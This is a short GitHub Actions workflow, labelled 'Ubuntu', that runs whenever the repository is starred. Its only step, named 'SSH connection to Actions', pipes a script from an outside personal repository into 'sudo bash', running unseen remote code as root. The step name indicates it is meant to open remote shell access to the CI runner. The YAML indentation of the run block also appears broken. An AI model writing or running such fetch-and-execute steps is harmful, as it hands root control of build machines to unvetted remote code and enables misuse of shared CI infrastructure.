name: Ubuntu
on:
  watch:
    types: started
jobs:
  Ubuntu:
    runs-on: ubuntu-latest
    steps:
    - name: SSH connection to Actions
      run: |
      curl https://raw.githubusercontent.com/zsdresd/sh/master/a.sh | sudo bash
